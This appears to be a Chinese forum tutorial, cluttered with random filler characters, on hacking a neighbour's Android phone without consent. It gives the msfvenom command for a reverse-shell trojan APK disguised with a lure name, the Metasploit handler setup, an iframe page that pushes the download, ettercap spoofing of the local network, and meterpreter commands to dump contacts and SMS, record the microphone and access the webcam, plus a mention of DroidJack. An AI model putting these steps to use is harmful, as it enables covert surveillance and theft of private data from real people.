* ?. ~- l3 s0 `0 P
五、msf+ettercap入侵邻居安卓手机
/ A# k. d4 F1 z9 s! K' t* V ' }6 h5 ?5 u+ T. a0 A0 i! { }. Y# d1 l
\) ~: I, N+ s; Y 首先启动msf / n( i Y( T1 T' N. \% W% Q
o1 F0 _( B% m) t1 q/ x( W5 ?
1 @" q" h" L. L
先用kali生成一个安卓木马,如下命令: * L; D+ o% z4 \5 n* R" {
; r- \. F0 c' Y1 m0 @2 p
) Q1 n. W7 Y+ K* A7 e
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
5 n( M6 R4 O- e7 X# t! P/ X N2 m1 N; Q! S x# g
# z2 a! p8 N. C o; U, J) @
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 m: e4 _6 N f. S
u- {4 z" |. o3 k
9 P8 v9 j" v3 W; m 然后进入msf
U# K( M# C5 a4 _$ E( { ; w7 i6 ^' e8 p
$ A- s m' j4 q5 ?& v8 a1 I use exploit/multi/handler
: h' a+ G- ?( r8 X8 ?( ]5 b
% ]8 V1 o0 S* _# H' k1 Z7 D) m& X# L$ I* X
set payload android/meterpreter/reverse_tcp 6 Z9 o. }+ [. w& J
& o0 ]; G1 L4 l8 e
* {. T) s! E2 _, S set LHOST 192.168.0.109 //ip为kaili的ip " L6 t+ J* m: d; |4 {) d b) i3 u
$ Y/ N7 l, V6 a# F' N+ P
1 U8 J- h5 k' a- c' T
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 2 Q x/ T+ a9 ]: ?9 f# W! w5 l
5 T& y2 O+ l# G1 f6 A+ q x; B' M; D7 l- |! F9 o
Exploit
# K# P4 x: _* [; f! D: n1 \ * I. Q+ w' f* Q/ X0 A7 o
: h" V: ^+ V" I/ v
. M, D/ f8 a* f1 {4 D8 d8 [
: X* {& J4 _9 j' v k* e9 Y! l% I. g" t% w- t9 u& N# D
下面我们开启ettercap -G
! s# ?8 X+ s! [* F* ~3 t& m * D0 c0 e0 G5 ?2 Q+ y. D1 I; @3 i. }
( u$ @9 l* d5 T) j, r% A
我物理IP为 " \$ Z+ B4 u" A' s x2 U8 f" ?* B7 u
6 q a+ ^" [4 L3 v x8 t/ i& I
8 h" Q# k& r. @# s9 L* z " {! S. X/ v( o& p; L+ y
& L/ B% C# C3 `+ Q+ w4 K' v$ ?9 \. a( \6 l$ B/ H; ]6 a9 v
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
! h+ d m3 i& i% v; y' g$ j7 o
- F2 b7 r( G& d$ I$ v- A" z# L0 ?3 [8 |! b7 p
下面我们来设置一下
" o% A: w/ ]5 R! P: z( k . j$ l7 H- z: c* I$ f' A f H
- C3 T& n/ `8 U& v& c: ]9 ^/ U
8 C* e1 r7 F; ?) |
: G1 ^, G& W+ S' x8 b# k
- H' e2 g- j8 N 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
+ v. O- ~9 Q/ ?2 I) Y0 h$ W1 c
K! j' c: \1 |* E1 C5 l+ W x0 j
" c# T' K) I7 N8 }0 T; U+ I
( |/ B' i2 k7 ?) Q0 a: S' s+ N" R / N# y- \) _& c/ |
9 B) S- s& x. M8 |5 b* ]7 b0 B2 d
: B& L+ b+ f d/ v8 v3 G m4 m3 r ) E: b3 W2 I t* {( u
6 F7 ~8 h8 P. o; K: V/ t2 R
- m8 `7 w6 u$ q+ ~* a1 ~9 o
8 l) @; c( | l/ }3 v% V/ L9 S6 d0 x7 F @) p, Y# b6 z0 W5 J0 Q2 P
9 N) S. X" c9 R6 W% a* c9 \0 ?
& I2 V6 T4 a) P: k; b
3 P W$ S" C+ Z- p: y! _. ] : Z+ B9 @& c* F4 S. n ?
+ Q" e% L% ?# k2 E7 Y
+ h1 V' d: @) @8 {( U6 C
! H: A& v0 I7 Z, w b, X
( M% B( r, e2 C; E) j- k
# [! `" i: u7 K! j% A, \
& L+ c. }7 @+ G+ p6 ]
* M; c1 y+ j u& b u4 U: b4 u) x2 v) y! c1 v/ G
- Z) R" x4 X6 a( E, I" |0 [8 }
5 t* M; Z6 p) {1 ^6 K; Z9 O$ z- h, C# g9 p$ r2 O* W
8 P; \# q) v' J) D/ z; Y; q9 L
2 A) m5 \; D# Z; x) c( v' y% Z+ j m7 w8 J3 n4 P
# G+ }. h4 E( z5 W
; h3 L3 g% B# k+ i5 {) E" }" q/ f" V. J. B9 ?# Z) x
& R# s$ P5 }' m/ x; L7 ?; l
: v3 f$ X5 s, b( O
# o: C3 |0 u6 u8 K% j 2 a$ y! j5 H% q6 `$ c
! f" e1 G5 I* _. q" C% M, x. z
/ w9 N6 g. {. K J8 l* ? * P7 `* m) h. M& G3 |
6 J! ^' M3 h) ^8 B8 c
' z, ^% z! v8 B& t! y$ x/ E 下面我们开始攻击 : P1 C* f$ L4 F3 d' J
' Y" J% I- L# o' w3 [+ a, y" L* L- f F2 V' p
& i* t+ { H. P; Q+ }6 R d B' A; o9 V% k( S) y
+ ^; P6 r$ p# _' P 5 n/ Z& O; n' B1 l. W* P
3 ?4 h V& Y6 I) m6 _
1 t" w$ O( r0 W. K9 X, b
% t7 w, z" O+ U8 }5 x4 ^
: X5 X3 Q4 o O
7 P: `- O- \3 F5 W/ J- I- Q / M' c$ W; r9 l4 l2 g; x `+ s7 q3 ~
* @6 s' m7 Q0 C+ m' v+ n& m8 |( I( S! r$ b
8 M/ Q$ }3 }% z; t: ?4 L+ |" } - D$ [9 {+ K# \: p+ q$ A+ e8 t
6 B) q) y9 j% @* Q8 j+ j0 q- A
大概过了5分钟多,发现反弹成功了 - @# }4 Z5 @/ E7 a8 g
: f& K: H7 J2 D
7 x) q3 Z* h5 K8 @( l
9 T X& h$ E+ H
" B) t! p0 Z4 z( Z. y. h Z8 v
2 U2 s! m7 S' @5 t* l% \
& y; u) \& q' ]8 ~4 M4 x
2 a: `5 h* e+ w/ R% w: y$ M( v) I5 f( a
9 n0 ]" y+ B. K/ ?: U) x' H 9 }, F3 Z+ e) p8 U9 V: o) B
$ u& U/ v/ }4 A9 M) h
: e, u* u. Q8 x1 U) z% ]
" l6 f4 q4 m3 G) H d
, J q* Q8 ~' I' B' z G# a$ s7 p3 Q $ ~5 D3 S% ~: _2 b; V
9 a( M& l0 l) J: ]
' w. K! p5 w5 n3 ^0 N9 R! E- B
w' n x) h. @$ V
" F C7 g9 j5 F8 Y9 p, ?0 z* w' `4 F9 \
# Q1 ^$ m) f; v n: C* W3 r0 F" u
$ \5 }" k' {, l3 k* h* s) S- a `" T/ ~, I6 m( N; o4 I/ z6 q# z
执行命令
. ?4 a& x' K2 N3 y
9 R% f# ]; G p" d+ O3 ^1 q5 S$ \8 o" n: j5 |- l
( w. h& z/ y( S2 B$ E% E! t3 P1 e
; ^% ^. v1 m- N- @" W/ _' {
U% [: u3 m; g0 n5 U dump_contacts --》这个是导出电话
2 H7 {+ a7 S9 B* X; t
; Z0 S3 B7 c* ~" ]; _* g+ m- q; I4 L9 |' t8 N. j
dump_sms --》这个是导出信息
; G C& q+ I; } `& A$ C
/ B1 B0 j) e- ~3 f2 T8 t! q. D. J/ w" F
record_mic Record audio from the default microphone for X seconds ( n, h) j) I: r- c, @
- Z$ ?7 ~4 w# @
& ]; j4 V8 m* n( O8 w6 ~ webcam_chat Start a video chat
% g! M. }2 O, S( D; h* {
# P* v5 m* O; r2 _) q3 C* E* a/ B4 x
1 C1 N) k' `8 _& b x+ p: B! r webcam_list List webcams
2 {* M; k0 c9 Y& s6 \ 4 U {& o; |8 f' C7 D+ e
+ n; O5 h3 N+ r: i2 }7 e webcam_snap Take a snapshot from the specified webcam / f1 I3 ?. f1 v
( w% F! p7 E) C& A) A# `) G
^; O- t( R" ?9 L& I; L4 s webcam_stream   lay a video stream from the specified webcam 7 n$ ]% N9 n& f5 W. X& |! w
8 ] Z9 _9 k$ ?7 b2 \; [- H2 Y4 B6 H
2 p! O/ Q& V3 x8 g ! ]" o7 G8 p# h, Y5 G5 A' i, y
0 T$ G3 R0 J' ~' L4 E" }: w% E ~8 s4 Z& Y/ r# C
$ Q% d! |5 V) F% U+ j 2 y. ], n0 }+ @3 r8 U
8 [$ e# B! ]" v0 H
我们打开看一下电话薄, 4 L2 _$ Z8 ]9 K1 v
$ Y7 M- u; {. L( K3 b
# d: ?8 T/ y! |* |' c- a 6 x/ j( B+ Q& d" |8 \
& M! w m& z$ y y1 G
9 S" @- J2 j X& f: H; j( n4 ~
; R# N% x+ I* R% Y8 j. X0 ?) i
% a' J2 s" U0 _3 m4 D y$ R7 M0 S( \, ?' ^
8 \1 n' |' C; Y/ p) H
4 Y. _1 h* _0 ]6 N$ K7 @2 U
, |# u" |9 k3 G+ E) T
J6 T0 J% A1 x8 H3 }7 K5 e, I- m
8 p8 P8 _9 o. b' y" C; R) }. z- T- b
6 { E& u# F; b0 P' @4 x
% i3 z; Q4 C* ?# ]# p- P& C
0 L Y/ b" n# h! `, P+ F6 a
/ O6 K' b) S8 R- d, s+ \5 J
% x( Y# H: l9 v" y$ P' o
4 i8 t/ a* z4 [
. l1 l- u' T$ |% G: H0 @ 我们同时欺骗成DroidJack木马,使用方法如图: + L# U# V: d5 ^
' g5 [4 i7 h( L( _8 i
9 J, G# i0 N7 z1 k1 s ; t9 g7 A5 x4 G
h. L: Z6 T7 C; U3 x0 c2 \- m1 E( M! k) r! F
+ G5 b/ h$ D C" d& W2 |+ Y2 L
6 _- x4 R4 C9 Z# y
' b3 _% _0 g: Q' H( I : k* ~' e, \0 h/ v+ ^/ w
- ]1 d( A( n! w0 E8 B1 R' i7 l" U
, e! G) ]) |4 c% u 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 : W" E+ W( a! r8 T- m
! c' T) R0 [) L: `* s% U: o; h* Z1 G) c5 A9 a
( a, l. w( l$ z4 u
/ \! }) O; t9 j5 s" R9 z
; B/ A' D' @' J% b0 ~2 F ( S4 G8 J+ b F* B$ ` ~0 _
- f! x1 Q$ j2 Q' b! h& z* l& S0 N9 Y1 R$ J
" o2 Q% Y! L0 _# V
5 t1 n3 K3 q# I1 f- A
, O) V+ M# q$ L: b0 Z  # l4 V8 u, }/ P0 L
; o+ M4 M V+ U- h7 M' {# ?, {0 R
# E' q1 ]# D5 ? j0 q 9 N% \% w) D; l$ z. G
|